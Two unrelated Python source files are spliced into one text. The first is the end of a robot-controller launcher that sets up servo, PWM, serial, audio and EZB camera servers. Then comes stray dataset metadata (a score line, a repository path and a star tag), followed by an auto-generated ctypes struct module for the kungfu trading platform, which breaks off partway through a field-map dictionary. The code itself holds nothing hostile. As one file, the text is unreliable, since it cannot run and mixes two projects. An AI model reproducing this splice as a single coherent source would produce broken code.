    """Register a PCA9685 over I2C as a servo controller, exposing each of
    its 16 channels both as a servo port "S0".."S15" (pulse range
    560-2140 us) and as a PWM port "P0".."P15"."""
    import PCA9685Controller
    registry = ComponentRegistry.ComponentRegistry
    controller = PCA9685Controller.PCA9685ServoController(i2c_com, logging.DEBUG)
    registry.register_controller(controller)
    for channel in range(16):
        registry.register_component("S" + str(channel), ServoController.ServoPort(controller, channel, 560, 2140))
    # The controller frequency is shared per chip and is 50 Hz for servo
    # timing, so the PWM ports below also run at 50 Hz.
    for channel in range(16):
        registry.register_component("P" + str(channel), PWMController.PWMPort(controller, channel))
    controller.start()
def setup_i2c_PimoroniPanTiltHatServoController(i2c_com):
    """Register the Pimoroni Pan-Tilt HAT as two servo ports "S0" and "S1"
    (pulse range 575-2325 us).
    https://shop.pimoroni.com/products/pan-tilt-hat
    """
    import PimoroniPanTiltHatServoController
    registry = ComponentRegistry.ComponentRegistry
    controller = PimoroniPanTiltHatServoController.PimoroniPanTiltHatServoController(i2c_com, logging.DEBUG)
    registry.register_controller(controller)
    for channel in range(2):
        registry.register_component("S" + str(channel), ServoController.ServoPort(controller, channel, 575, 2325))
    controller.start()
def setup_serial_MaestroServoController(serial_port_name):
    """Register a Pololu Maestro attached at *serial_port_name* with 24
    servo ports "S0".."S23" using the EZ-Robot pulse range 560-2140 us."""
    import MaestroServoController
    registry = ComponentRegistry.ComponentRegistry
    controller = MaestroServoController.MaestroServoController(serial_port_name, logging.DEBUG)
    registry.register_controller(controller)
    for channel in range(24):
        registry.register_component("S" + str(channel), ServoController.ServoPort(controller, channel, 560, 2140))
    controller.start()
def setup_SerialPortController(component_name, device_name, baud_rate):
    """Open serial device *device_name* at *baud_rate* and register it
    under *component_name*."""
    registry = ComponentRegistry.ComponentRegistry
    controller = SerialPortController.SerialPortController(device_name, baud_rate, logging.DEBUG)
    registry.register_component(component_name, controller)
    registry.register_controller(controller)
    controller.start()
def setup_PyAudioPlayerController(audio_output_index):
    """Register the PyAudio-based player as component "audio_player" on
    the output device selected by *audio_output_index*."""
    # NOTE(review): presumably makes ALSA fall back to the plughw plugin
    # for format/rate conversion -- confirm against PortAudio docs.
    os.environ["PA_ALSA_PLUGHW"] = "1"
    import PyAudioPlayerController
    registry = ComponentRegistry.ComponentRegistry
    controller = PyAudioPlayerController.PyAudioPlayerController(logging.DEBUG, audio_output_index)
    registry.register_component("audio_player", controller)
    registry.register_controller(controller)
    controller.start()
def main():
    """Parse command-line options, start the configured controllers and
    servers, block until Enter is pressed (or the process is interrupted),
    then stop all registered controllers in reverse start order.
    """
    logging.basicConfig(format="%(process)d-%(name)s-%(levelname)s-%(message)s", level=logging.INFO)
    logging.info("Starting... platform=%s hostname=%s", sys.platform, socket.gethostname())
    parser = argparse.ArgumentParser()
    # EZB protocol server endpoint.
    parser.add_argument("--ezbaddr", type=str, default="0.0.0.0", help="EZB Server IP address (default: %(default)s)")
    parser.add_argument("--ezbport", type=int, default=10023, help="EZB Server TCP port (default: %(default)s)")
    # Camera streaming server endpoint and video parameters.
    parser.add_argument("--camaddr", type=str, default="0.0.0.0", help="Camera Server IP Address (default: %(default)s)")
    parser.add_argument("--camport", type=int, default=10024, help="Camera Server TCP Port (default: %(default)s)")
    parser.add_argument("--camwidth", type=int, default=640, help="Camera Video's Width (default: %(default)s)")
    parser.add_argument("--camheight", type=int, default=480, help="Camera Video's Height (default: %(default)s)")
    parser.add_argument("--camfps", type=int, default=15, help="Camera Video's frames per second (default: %(default)s)")
    parser.add_argument("--camrotation", type=int, default=0, help="Camera Video's rotation (0, 90, 180, and 270) (default: %(default)s)")
    parser.add_argument("--camflip",
                        default="none",
                        const="none",
                        nargs="?",
                        choices=["none", "horizontal", "vertical", "both"],
                        help="(default: %(default)s)")
    parser.add_argument("--jpgquality", type=int, default=95, help="Jpeg's quality (0-100) (default: %(default)s)")
    # Optional audio playback support.
    parser.add_argument("--audio", action='store_true', help="enable audio output (default: %(default)s)")
    parser.add_argument("--audiooutputindex", type=int, default=0, help="AudioOutput index (default: %(default)s)")
    parser.add_argument("--camtype",
                        default="none",
                        const="none",
                        nargs="?",
                        choices=["none", "picamera", "videocapture", "fake"],
                        help="(default: %(default)s)")
    parser.add_argument("--videocaptureindex", type=int, default=0, help="VideoCapture index (default: %(default)s)")
    # Optional UART pass-through devices.
    parser.add_argument("--uart0", type=str, default=None, help="UART 0's serial device e.g. /dev/serial0 com4 (default: %(default)s)")
    parser.add_argument("--uart1", type=str, default=None, help="UART 1's serial device e.g. /dev/serial0 com4 (default: %(default)s)")
    parser.add_argument("--uart2", type=str, default=None, help="UART 2's serial device e.g. /dev/serial0 com4 (default: %(default)s)")
    # Optional servo/PWM hardware controllers.
    parser.add_argument("--pca9685",
                        default="none",
                        const="none",
                        nargs="?",
                        choices=["none", "servo", "pwm"],
                        help="servo=controller for servos, pwm=controller for pwm ports (default: %(default)s)")
    parser.add_argument("--pantilthat", action='store_true', help="enable Pimoroni Pan-Tilt HAT https://shop.pimoroni.com/products/pan-tilt-hat (default: %(default)s)")
    parser.add_argument("--maestro", type=str, default=None, help="enable Pololu Maestro serial device e.g. /dev/ttyACM0 com40 (default: %(default)s)")
    args = parser.parse_args()
    try:
        if args.audio:
            setup_PyAudioPlayerController(args.audiooutputindex)
        # Digital ports and the I2C bus are always set up; the I2C
        # controller instance is reused by the optional I2C devices below.
        setup_digital_ports()
        i2c_com = setup_i2c()
        if args.uart0 is not None:
            setup_SerialPortController("uart0", args.uart0, 115200)
        if args.uart1 is not None:
            setup_SerialPortController("uart1", args.uart1, 115200)
        if args.uart2 is not None:
            setup_SerialPortController("uart2", args.uart2, 115200)
        if args.maestro is not None:
            ###Pololu Mini Maestro 24-Channel USB Servo Controller https://www.pololu.com/product/1356
            ###Used for 24 servos ports D0..D23
            setup_serial_MaestroServoController(args.maestro)
        if args.pca9685 == "pwm":
            ###Adafruit 16-Channel PWM https://www.adafruit.com/product/2327
            ###Used for PWM ports (0..23)
            setup_i2c_PCA9685Controller(i2c_com)
        elif args.pca9685 == "servo":
            ###Used for Servo ports (0..23)
            setup_i2c_PCA9685ServoController(i2c_com)
        if args.pantilthat:
            ###Pimoroni Pan-Tilt HAT https://shop.pimoroni.com/products/pan-tilt-hat
            ###Used to map servo ports D0..D1
            setup_i2c_PimoroniPanTiltHatServoController(i2c_com)
        # Start the EZB protocol server and, when a camera is configured,
        # the camera streaming server; then wait for operator input.
        EZBTcpServer.start((args.ezbaddr, args.ezbport))
        if args.camtype != "none":
            EZBCameraServer.start((args.camaddr, args.camport), args)
        #time.sleep(3)
        input("===> Press Enter to quit...\n")
        logging.debug("*** Enter pressed ***")
    except KeyboardInterrupt:
        print("*** Keyboard Interrupt ***")
    except Exception as ex:
        logging.fatal("Exception: %s", ex)
    # Shutdown: stop controllers in reverse order of registration so that
    # dependent controllers stop before the buses they rely on.
    logging.info("Terminating")
    controllers = ComponentRegistry.ComponentRegistry.Controllers.copy()
    controllers.reverse()
    for controller in controllers:
        logging.info("stopping controller: %s", controller.name)
        controller.stop()
    logging.info("Terminated")

if __name__ == "__main__":
    main()
| 1.8125 | 2 |
python/kungfu/longfist/longfist_structs.py | dfhljf/kungfu | 3 | 12761002 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# auto generated by struct_info_parser.py, please DO NOT edit!!!
from ctypes import *
import longfist_constants as lf
from longfist_structs_sniffer import *
class LFMarketDataField(Structure):
    """Level-1 market data snapshot (ctypes mirror of the C struct)."""
    _fields_ = [
        ("TradingDay", c_char * 13),  # trading day
        ("InstrumentID", c_char * 31),  # instrument code
        ("ExchangeID", c_char * 9),  # exchange code
        ("ExchangeInstID", c_char * 64),  # instrument code used by the exchange
        ("LastPrice", c_double),  # last price
        ("PreSettlementPrice", c_double),  # previous settlement price
        ("PreClosePrice", c_double),  # previous close price
        ("PreOpenInterest", c_double),  # previous open interest
        ("OpenPrice", c_double),  # today's open price
        ("HighestPrice", c_double),  # highest price
        ("LowestPrice", c_double),  # lowest price
        ("Volume", c_int),  # traded volume
        ("Turnover", c_double),  # traded amount (turnover)
        ("OpenInterest", c_double),  # open interest
        ("ClosePrice", c_double),  # today's close price
        ("SettlementPrice", c_double),  # settlement price of this session
        ("UpperLimitPrice", c_double),  # upper (limit-up) price
        ("LowerLimitPrice", c_double),  # lower (limit-down) price
        ("PreDelta", c_double),  # previous delta
        ("CurrDelta", c_double),  # current delta
        ("UpdateTime", c_char * 13),  # last update time
        ("UpdateMillisec", c_int),  # last update millisecond
        ("BidPrice1", c_double),  # bid price 1
        ("BidVolume1", c_int),  # bid volume 1
        ("AskPrice1", c_double),  # ask price 1
        ("AskVolume1", c_int),  # ask volume 1
        ("BidPrice2", c_double),  # bid price 2
        ("BidVolume2", c_int),  # bid volume 2
        ("AskPrice2", c_double),  # ask price 2
        ("AskVolume2", c_int),  # ask volume 2
        ("BidPrice3", c_double),  # bid price 3
        ("BidVolume3", c_int),  # bid volume 3
        ("AskPrice3", c_double),  # ask price 3
        ("AskVolume3", c_int),  # ask volume 3
        ("BidPrice4", c_double),  # bid price 4
        ("BidVolume4", c_int),  # bid volume 4
        ("AskPrice4", c_double),  # ask price 4
        ("AskVolume4", c_int),  # ask volume 4
        ("BidPrice5", c_double),  # bid price 5
        ("BidVolume5", c_int),  # bid volume 5
        ("AskPrice5", c_double),  # ask price 5
        ("AskVolume5", c_int),  # ask volume 5
    ]
class LFL2MarketDataField(Structure):
    """Level-2 market data snapshot with 10-level depth (ctypes mirror of
    the C struct)."""
    _fields_ = [
        ("TradingDay", c_char * 9),  # trading day
        ("TimeStamp", c_char * 9),  # timestamp
        ("ExchangeID", c_char * 9),  # exchange code
        ("InstrumentID", c_char * 31),  # instrument code
        ("PreClosePrice", c_double),  # previous close price
        ("OpenPrice", c_double),  # today's open price
        ("ClosePrice", c_double),  # close price
        ("IOPV", c_double),  # IOPV (indicative fund NAV estimate)
        ("YieldToMaturity", c_double),  # yield to maturity
        ("AuctionPrice", c_double),  # dynamic reference (auction) price
        ("TradingPhase", c_char),  # trading phase (char)
        ("OpenRestriction", c_char),  # open-position restriction (char)
        ("HighPrice", c_double),  # highest price
        ("LowPrice", c_double),  # lowest price
        ("LastPrice", c_double),  # last price
        ("TradeCount", c_double),  # number of trades
        ("TotalTradeVolume", c_double),  # total traded volume
        ("TotalTradeValue", c_double),  # total traded value
        ("OpenInterest", c_double),  # open interest
        ("TotalBidVolume", c_double),  # total buy-order volume
        ("WeightedAvgBidPrice", c_double),  # weighted average bid price
        ("AltWeightedAvgBidPrice", c_double),  # weighted average bid price for bonds
        ("TotalOfferVolume", c_double),  # total sell-order volume
        ("WeightedAvgOfferPrice", c_double),  # weighted average offer price
        ("AltWeightedAvgOfferPrice", c_double),  # weighted average offer price for bonds
        ("BidPriceLevel", c_int),  # number of bid price levels
        ("OfferPriceLevel", c_int),  # number of offer price levels
        ("BidPrice1", c_double),  # bid price 1
        ("BidVolume1", c_double),  # bid volume 1
        ("BidCount1", c_int),  # actual number of buy orders at level 1
        ("BidPrice2", c_double),  # bid price 2
        ("BidVolume2", c_double),  # bid volume 2
        ("BidCount2", c_int),  # actual number of buy orders at level 2
        ("BidPrice3", c_double),  # bid price 3
        ("BidVolume3", c_double),  # bid volume 3
        ("BidCount3", c_int),  # actual number of buy orders at level 3
        ("BidPrice4", c_double),  # bid price 4
        ("BidVolume4", c_double),  # bid volume 4
        ("BidCount4", c_int),  # actual number of buy orders at level 4
        ("BidPrice5", c_double),  # bid price 5
        ("BidVolume5", c_double),  # bid volume 5
        ("BidCount5", c_int),  # actual number of buy orders at level 5
        ("BidPrice6", c_double),  # bid price 6
        ("BidVolume6", c_double),  # bid volume 6
        ("BidCount6", c_int),  # actual number of buy orders at level 6
        ("BidPrice7", c_double),  # bid price 7
        ("BidVolume7", c_double),  # bid volume 7
        ("BidCount7", c_int),  # actual number of buy orders at level 7
        ("BidPrice8", c_double),  # bid price 8
        ("BidVolume8", c_double),  # bid volume 8
        ("BidCount8", c_int),  # actual number of buy orders at level 8
        ("BidPrice9", c_double),  # bid price 9
        ("BidVolume9", c_double),  # bid volume 9
        ("BidCount9", c_int),  # actual number of buy orders at level 9
        ("BidPriceA", c_double),  # bid price 10
        ("BidVolumeA", c_double),  # bid volume 10
        ("BidCountA", c_int),  # actual number of buy orders at level 10
        ("OfferPrice1", c_double),  # offer price 1
        ("OfferVolume1", c_double),  # offer volume 1
        ("OfferCount1", c_int),  # actual number of sell orders at level 1
        ("OfferPrice2", c_double),  # offer price 2
        ("OfferVolume2", c_double),  # offer volume 2
        ("OfferCount2", c_int),  # actual number of sell orders at level 2
        ("OfferPrice3", c_double),  # offer price 3
        ("OfferVolume3", c_double),  # offer volume 3
        ("OfferCount3", c_int),  # actual number of sell orders at level 3
        ("OfferPrice4", c_double),  # offer price 4
        ("OfferVolume4", c_double),  # offer volume 4
        ("OfferCount4", c_int),  # actual number of sell orders at level 4
        ("OfferPrice5", c_double),  # offer price 5
        ("OfferVolume5", c_double),  # offer volume 5
        ("OfferCount5", c_int),  # actual number of sell orders at level 5
        ("OfferPrice6", c_double),  # offer price 6
        ("OfferVolume6", c_double),  # offer volume 6
        ("OfferCount6", c_int),  # actual number of sell orders at level 6
        ("OfferPrice7", c_double),  # offer price 7
        ("OfferVolume7", c_double),  # offer volume 7
        ("OfferCount7", c_int),  # actual number of sell orders at level 7
        ("OfferPrice8", c_double),  # offer price 8
        ("OfferVolume8", c_double),  # offer volume 8
        ("OfferCount8", c_int),  # actual number of sell orders at level 8
        ("OfferPrice9", c_double),  # offer price 9
        ("OfferVolume9", c_double),  # offer volume 9
        ("OfferCount9", c_int),  # actual number of sell orders at level 9
        ("OfferPriceA", c_double),  # offer price 10
        ("OfferVolumeA", c_double),  # offer volume 10
        ("OfferCountA", c_int),  # actual number of sell orders at level 10
        ("InstrumentStatus", c_char * 7),  # instrument status
        ("PreIOPV", c_double),  # previous IOPV
        ("PERatio1", c_double),  # P/E ratio 1
        ("PERatio2", c_double),  # P/E ratio 2
        ("UpperLimitPrice", c_double),  # upper (limit-up) price
        ("LowerLimitPrice", c_double),  # lower (limit-down) price
        ("WarrantPremiumRatio", c_double),  # warrant premium ratio
        ("TotalWarrantExecQty", c_double),  # total warrant exercise quantity
        ("PriceDiff1", c_double),  # price change 1
        ("PriceDiff2", c_double),  # price change 2
        ("ETFBuyNumber", c_double),  # number of ETF subscription orders
        ("ETFBuyAmount", c_double),  # ETF subscription volume
        ("ETFBuyMoney", c_double),  # ETF subscription amount
        ("ETFSellNumber", c_double),  # number of ETF redemption orders
        ("ETFSellAmount", c_double),  # ETF redemption volume
        ("ETFSellMoney", c_double),  # ETF redemption amount
        ("WithdrawBuyNumber", c_double),  # number of cancelled buy orders
        ("WithdrawBuyAmount", c_double),  # cancelled buy volume
        ("WithdrawBuyMoney", c_double),  # cancelled buy amount
        ("TotalBidNumber", c_double),  # total number of buy orders
        ("BidTradeMaxDuration", c_double),  # maximum waiting time for a buy order to trade
        ("NumBidOrders", c_double),  # number of bid price levels with orders
        ("WithdrawSellNumber", c_double),  # number of cancelled sell orders
        ("WithdrawSellAmount", c_double),  # cancelled sell volume
        ("WithdrawSellMoney", c_double),  # cancelled sell amount
        ("TotalOfferNumber", c_double),  # total number of sell orders
        ("OfferTradeMaxDuration", c_double),  # maximum waiting time for a sell order to trade
        ("NumOfferOrders", c_double),  # number of offer price levels with orders
    ]
class LFL2IndexField(Structure):
    """Level-2 index quote (ctypes mirror of the C struct)."""
    _fields_ = [
        ("TradingDay", c_char * 9),  # trading day
        ("TimeStamp", c_char * 9),  # quote time (seconds)
        ("ExchangeID", c_char * 9),  # exchange code
        ("InstrumentID", c_char * 31),  # index code
        ("PreCloseIndex", c_double),  # previous closing index value
        ("OpenIndex", c_double),  # today's opening index value
        ("CloseIndex", c_double),  # today's closing index value
        ("HighIndex", c_double),  # highest index value
        ("LowIndex", c_double),  # lowest index value
        ("LastIndex", c_double),  # latest index value
        ("TurnOver", c_double),  # turnover (CNY) of trades included in the index calculation
        ("TotalVolume", c_double),  # volume (lots) of trades included in the index calculation
    ]
class LFL2OrderField(Structure):
    """Level-2 order-by-order feed entry (ctypes mirror of the C struct)."""
    _fields_ = [
        ("OrderTime", c_char * 9),  # order time (seconds)
        ("ExchangeID", c_char * 9),  # exchange code
        ("InstrumentID", c_char * 31),  # instrument code
        ("Price", c_double),  # order price
        ("Volume", c_double),  # order volume
        ("OrderKind", c_char * 2),  # order kind
    ]
class LFL2TradeField(Structure):
    """Level-2 trade-by-trade feed entry (ctypes mirror of the C struct)."""
    _fields_ = [
        ("TradeTime", c_char * 9),  # trade time (seconds)
        ("ExchangeID", c_char * 9),  # exchange code
        ("InstrumentID", c_char * 31),  # instrument code
        ("Price", c_double),  # trade price
        ("Volume", c_double),  # trade volume
        ("OrderKind", c_char * 2),  # order kind
        ("OrderBSFlag", c_char * 2),  # buy/sell (taker side) flag
    ]
class LFBarMarketDataField(Structure):
    """OHLC bar aggregated from ticks (ctypes mirror of the C struct)."""
    _fields_ = [
        ("TradingDay", c_char * 9),  # trading day
        ("InstrumentID", c_char * 31),  # instrument code
        ("UpperLimitPrice", c_double),  # upper (limit-up) price
        ("LowerLimitPrice", c_double),  # lower (limit-down) price
        ("StartUpdateTime", c_char * 13),  # update time of the first tick in the bar
        ("StartUpdateMillisec", c_int),  # millisecond of the first tick in the bar
        ("EndUpdateTime", c_char * 13),  # update time of the last tick in the bar
        ("EndUpdateMillisec", c_int),  # millisecond of the last tick in the bar
        ("Open", c_double),  # open price
        ("Close", c_double),  # close price
        ("Low", c_double),  # low price
        ("High", c_double),  # high price
        ("Volume", c_double),  # traded volume within the bar interval
        ("StartVolume", c_double),  # cumulative total volume at bar start
    ]
class LFQryPositionField(Structure):
    """Position query request (ctypes mirror of the C struct)."""
    _fields_ = [
        ("BrokerID", c_char * 11),  # broker code
        ("InvestorID", c_char * 19),  # investor code
        ("InstrumentID", c_char * 31),  # instrument code
        ("ExchangeID", c_char * 9),  # exchange code
    ]
class LFRspPositionField(Structure):
    """Position query response (ctypes mirror of the C struct)."""
    _fields_ = [
        ("InstrumentID", c_char * 31),  # instrument code
        ("YdPosition", c_int),  # yesterday's position
        ("Position", c_int),  # total position
        ("BrokerID", c_char * 11),  # broker code
        ("InvestorID", c_char * 19),  # investor code
        ("PositionCost", c_double),  # position cost
        ("HedgeFlag", c_char),  # speculation/hedge flag, LfHedgeFlagType
        ("PosiDirection", c_char),  # position direction (long/short), LfPosiDirectionType
    ]
class LFInputOrderField(Structure):
    """Order insertion request (ctypes mirror of the C struct)."""
    _fields_ = [
        ("BrokerID", c_char * 11),  # broker code
        ("UserID", c_char * 16),  # user code
        ("InvestorID", c_char * 19),  # investor code
        ("BusinessUnit", c_char * 21),  # business unit
        ("ExchangeID", c_char * 9),  # exchange code
        ("InstrumentID", c_char * 31),  # instrument code
        ("OrderRef", c_char * 21),  # order reference
        ("LimitPrice", c_double),  # price
        ("Volume", c_int),  # volume
        ("MinVolume", c_int),  # minimum fill volume
        ("TimeCondition", c_char),  # time-in-force type, LfTimeConditionType
        ("VolumeCondition", c_char),  # volume condition type, LfVolumeConditionType
        ("OrderPriceType", c_char),  # order price condition, LfOrderPriceTypeType
        ("Direction", c_char),  # buy/sell direction, LfDirectionType
        ("OffsetFlag", c_char),  # open/close (offset) flag, LfOffsetFlagType
        ("HedgeFlag", c_char),  # speculation/hedge flag, LfHedgeFlagType
        ("ForceCloseReason", c_char),  # forced liquidation reason, LfForceCloseReasonType
        ("StopPrice", c_double),  # stop-loss price
        ("IsAutoSuspend", c_int),  # auto-suspend flag
        ("ContingentCondition", c_char),  # trigger condition, LfContingentConditionType
        ("MiscInfo", c_char * 30),  # user-defined order tag
    ]
class LFRtnOrderField(Structure):
    """Order status return (ctypes mirror of the C struct)."""
    _fields_ = [
        ("BrokerID", c_char * 11),  # broker code
        ("UserID", c_char * 16),  # user code
        ("ParticipantID", c_char * 11),  # participant (member) code
        ("InvestorID", c_char * 19),  # investor code
        ("BusinessUnit", c_char * 21),  # business unit
        ("InstrumentID", c_char * 31),  # instrument code
        ("OrderRef", c_char * 21),  # order reference
        ("ExchangeID", c_char * 11),  # exchange code
        ("LimitPrice", c_double),  # price
        ("VolumeTraded", c_int),  # volume traded today
        ("VolumeTotal", c_int),  # remaining volume
        ("VolumeTotalOriginal", c_int),  # original order volume
        ("TimeCondition", c_char),  # time-in-force type, LfTimeConditionType
        ("VolumeCondition", c_char),  # volume condition type, LfVolumeConditionType
        ("OrderPriceType", c_char),  # order price condition, LfOrderPriceTypeType
        ("Direction", c_char),  # buy/sell direction, LfDirectionType
        ("OffsetFlag", c_char),  # open/close (offset) flag, LfOffsetFlagType
        ("HedgeFlag", c_char),  # speculation/hedge flag, LfHedgeFlagType
        ("OrderStatus", c_char),  # order status, LfOrderStatusType
        ("RequestID", c_int),  # request id
    ]
class LFRtnTradeField(Structure):
    """Trade (fill) return (ctypes mirror of the C struct)."""
    _fields_ = [
        ("BrokerID", c_char * 11),  # broker code
        ("UserID", c_char * 16),  # user code
        ("InvestorID", c_char * 19),  # investor code
        ("BusinessUnit", c_char * 21),  # business unit
        ("InstrumentID", c_char * 31),  # instrument code
        ("OrderRef", c_char * 21),  # order reference
        ("ExchangeID", c_char * 11),  # exchange code
        ("TradeID", c_char * 21),  # trade id
        ("OrderSysID", c_char * 31),  # exchange order id
        ("ParticipantID", c_char * 11),  # participant (member) code
        ("ClientID", c_char * 21),  # client code
        ("Price", c_double),  # price
        ("Volume", c_int),  # volume
        ("TradingDay", c_char * 13),  # trading day
        ("TradeTime", c_char * 13),  # trade time
        ("Direction", c_char),  # buy/sell direction, LfDirectionType
        ("OffsetFlag", c_char),  # open/close (offset) flag, LfOffsetFlagType
        ("HedgeFlag", c_char),  # speculation/hedge flag, LfHedgeFlagType
    ]
class LFOrderActionField(Structure):
    """Order action (cancel/modify) request (ctypes mirror of the C struct)."""
    _fields_ = [
        ("BrokerID", c_char * 11),  # broker code
        ("InvestorID", c_char * 19),  # investor code
        ("InstrumentID", c_char * 31),  # instrument code
        ("ExchangeID", c_char * 11),  # exchange code
        ("UserID", c_char * 16),  # user code
        ("OrderRef", c_char * 21),  # order reference
        ("OrderSysID", c_char * 31),  # exchange order id
        ("RequestID", c_int),  # request id
        ("ActionFlag", c_char),  # order action flag (char)
        ("LimitPrice", c_double),  # price
        ("VolumeChange", c_int),  # volume change
        ("KfOrderID", c_int),  # order id internal to the kungfu system
    ]
class LFQryAccountField(Structure):
    """Account query request (ctypes mirror of the C struct)."""
    _fields_ = [
        ("BrokerID", c_char * 11),  # broker code
        ("InvestorID", c_char * 19),  # investor code
    ]
class LFRspAccountField(Structure):
    """Account query response (ctypes mirror of the C struct)."""
    _fields_ = [
        ("BrokerID", c_char * 11),  # broker code
        ("InvestorID", c_char * 19),  # investor code
        ("PreMortgage", c_double),  # previous mortgage amount
        ("PreCredit", c_double),  # previous credit limit
        ("PreDeposit", c_double),  # previous deposit
        ("preBalance", c_double),  # previous settlement reserve (note: lowercase "p" kept as generated)
        ("PreMargin", c_double),  # previous occupied margin
        ("Deposit", c_double),  # deposit amount
        ("Withdraw", c_double),  # withdrawal amount
        ("FrozenMargin", c_double),  # frozen margin (for unfilled orders)
        ("FrozenCash", c_double),  # frozen cash (for unfilled orders)
        ("FrozenCommission", c_double),  # frozen commission (for unfilled orders)
        ("CurrMargin", c_double),  # current total margin
        ("CashIn", c_double),  # cash difference
        ("Commission", c_double),  # commission
        ("CloseProfit", c_double),  # realized (close) profit
        ("PositionProfit", c_double),  # position (floating) profit
        ("Balance", c_double),  # settlement reserve
        ("Available", c_double),  # available funds
        ("WithdrawQuota", c_double),  # withdrawable funds
        ("Reserve", c_double),  # basic reserve
        ("TradingDay", c_char * 9),  # trading day
        ("Credit", c_double),  # credit limit
        ("Mortgage", c_double),  # mortgage amount
        ("ExchangeMargin", c_double),  # exchange margin
        ("DeliveryMargin", c_double),  # investor delivery margin
        ("ExchangeDeliveryMargin", c_double),  # exchange delivery margin
        ("ReserveBalance", c_double),  # guaranteed futures settlement reserve
        ("Equity", c_double),  # current-day equity
        ("MarketValue", c_double),  # account market value
    ]
# Maps each LF struct name to a {field name: format code} dictionary used by
# the (de)serialisation helpers.  Codes: 'd' = double, 'i' = int,
# 'c' = single char, 'cN' = char array of length N; a value that is itself a
# dict is the longfist enum map translating the raw char code of that field.
DataFieldMap = {
    'LFL2MarketDataField': {
        'OfferVolumeA': 'd',
        'TotalOfferNumber': 'd',
        'WithdrawSellAmount': 'd',
        'BidCount3': 'i',
        'BidCount2': 'i',
        'BidCount1': 'i',
        'BidCount7': 'i',
        'BidCount6': 'i',
        'BidCount5': 'i',
        'BidCount4': 'i',
        'BidVolume7': 'd',
        'BidVolume6': 'd',
        'BidCount9': 'i',
        'BidCount8': 'i',
        'BidVolume3': 'd',
        'BidVolume2': 'd',
        'BidVolume1': 'd',
        'TradeCount': 'd',
        'BidPrice6': 'd',
        'PreIOPV': 'd',
        'TimeStamp': 'c9',
        'TradingDay': 'c9',
        'BidCountA': 'i',
        'OpenInterest': 'd',
        'BidVolumeA': 'd',
        'NumOfferOrders': 'd',
        'OfferVolume4': 'd',
        'OfferVolume5': 'd',
        'OfferVolume6': 'd',
        'OfferVolume7': 'd',
        'OfferVolume1': 'd',
        'OfferVolume2': 'd',
        'OfferVolume3': 'd',
        'OfferVolume8': 'd',
        'OfferVolume9': 'd',
        'ETFSellMoney': 'd',
        'TotalTradeVolume': 'd',
        'PriceDiff1': 'd',
        'PriceDiff2': 'd',
        'OfferPriceA': 'd',
        'BidPriceLevel': 'i',
        'TotalOfferVolume': 'd',
        'OfferPriceLevel': 'i',
        'InstrumentStatus': 'c7',
        'NumBidOrders': 'd',
        'ETFSellAmount': 'd',
        'WithdrawSellNumber': 'd',
        'AltWeightedAvgBidPrice': 'd',
        'WeightedAvgBidPrice': 'd',
        'OfferPrice8': 'd',
        'BidVolume9': 'd',
        'WithdrawBuyMoney': 'd',
        'OfferPrice4': 'd',
        'BidVolume8': 'd',
        'OfferPrice6': 'd',
        'OfferPrice7': 'd',
        'OfferPrice1': 'd',
        'OfferPrice2': 'd',
        'OfferPrice3': 'd',
        'WithdrawBuyAmount': 'd',
        'BidVolume5': 'd',
        'BidVolume4': 'd',
        'BidPrice9': 'd',
        'BidPrice8': 'd',
        'BidPrice5': 'd',
        'BidPrice4': 'd',
        'BidPrice7': 'd',
        'AltWeightedAvgOfferPrice': 'd',
        'BidPrice1': 'd',
        'TotalWarrantExecQty': 'd',
        'BidPrice3': 'd',
        'BidPrice2': 'd',
        'LowerLimitPrice': 'd',
        'OpenPrice': 'd',
        'WithdrawSellMoney': 'd',
        'OfferTradeMaxDuration': 'd',
        'OfferCount7': 'i',
        'WarrantPremiumRatio': 'd',
        'ExchangeID': 'c9',
        'ETFSellNumber': 'd',
        'AuctionPrice': 'd',
        'OfferPrice9': 'd',
        'YieldToMaturity': 'd',
        'OfferPrice5': 'd',
        'TradingPhase': 'c',
        'BidPriceA': 'd',
        'PERatio2': 'd',
        'TotalBidVolume': 'd',
        'PERatio1': 'd',
        'OfferCount8': 'i',
        'OfferCount9': 'i',
        'OfferCount6': 'i',
        'LowPrice': 'd',
        'OfferCount4': 'i',
        'OfferCount5': 'i',
        'OfferCount2': 'i',
        'OfferCount3': 'i',
        'TotalBidNumber': 'd',
        'OfferCount1': 'i',
        'WithdrawBuyNumber': 'd',
        'OpenRestriction': 'c',
        'BidTradeMaxDuration': 'd',
        'PreClosePrice': 'd',
        'UpperLimitPrice': 'd',
        'WeightedAvgOfferPrice': 'd',
        'InstrumentID': 'c31',
        'ClosePrice': 'd',
        'HighPrice': 'd',
        'TotalTradeValue': 'd',
        'IOPV': 'd',
        'LastPrice': 'd',
        'ETFBuyNumber': 'd',
        'ETFBuyMoney': 'd',
        'ETFBuyAmount': 'd',
        'OfferCountA': 'i',
    },
    'LFRtnTradeField': {
        'InstrumentID': 'c31',
        'ExchangeID': 'c11',
        'ParticipantID': 'c11',
        'TradeID': 'c21',
        'TradingDay': 'c13',
        'BusinessUnit': 'c21',
        'HedgeFlag': lf.LfHedgeFlagTypeMap,
        'Price': 'd',
        'UserID': 'c16',
        'Direction': lf.LfDirectionTypeMap,
        'ClientID': 'c21',
        'OrderRef': 'c21',
        'Volume': 'i',
        'InvestorID': 'c19',
        'BrokerID': 'c11',
        'OrderSysID': 'c31',
        'TradeTime': 'c13',
        'OffsetFlag': lf.LfOffsetFlagTypeMap,
    },
    'LFRspAccountField': {
        'Mortgage': 'd',
        'ExchangeDeliveryMargin': 'd',
        'FrozenMargin': 'd',
        'WithdrawQuota': 'd',
        'PositionProfit': 'd',
        'Commission': 'd',
        'Equity': 'd',
        'CashIn': 'd',
        'Available': 'd',
        'InvestorID': 'c19',
        'PreCredit': 'd',
        'PreMortgage': 'd',
        'ExchangeMargin': 'd',
        'PreMargin': 'd',
        'DeliveryMargin': 'd',
        'preBalance': 'd',
        'TradingDay': 'c9',
        'BrokerID': 'c11',
        'Deposit': 'd',
        'Withdraw': 'd',
        'Balance': 'd',
        'Reserve': 'd',
        'PreDeposit': 'd',
        'Credit': 'd',
        'MarketValue': 'd',
        'ReserveBalance': 'd',
        'CurrMargin': 'd',
        'FrozenCommission': 'd',
        'CloseProfit': 'd',
        'FrozenCash': 'd',
    },
    'LFL2IndexField': {
        'InstrumentID': 'c31',
        'ExchangeID': 'c9',
        'HighIndex': 'd',
        'TimeStamp': 'c9',
        'CloseIndex': 'd',
        'PreCloseIndex': 'd',
        'LastIndex': 'd',
        'TradingDay': 'c9',
        'OpenIndex': 'd',
